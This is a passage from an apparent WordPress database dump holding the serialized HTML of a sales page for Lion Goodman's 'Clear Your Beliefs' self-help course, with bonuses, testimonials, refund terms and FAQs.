Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1879, 2164, 'panels_data', 'a:3:{s:7:"widgets";a:5:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:24:"Video Clear Your Beliefs";s:4:"text";s:197:"<p> </p><div class="embed-container"><iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="300" height="150" frameborder="0" allowfullscreen="allowfullscreen"></iframe></div><p> </p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:9:"Red quote";s:4:"text";s:661:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:7:"Bullets";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:70516:"\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" 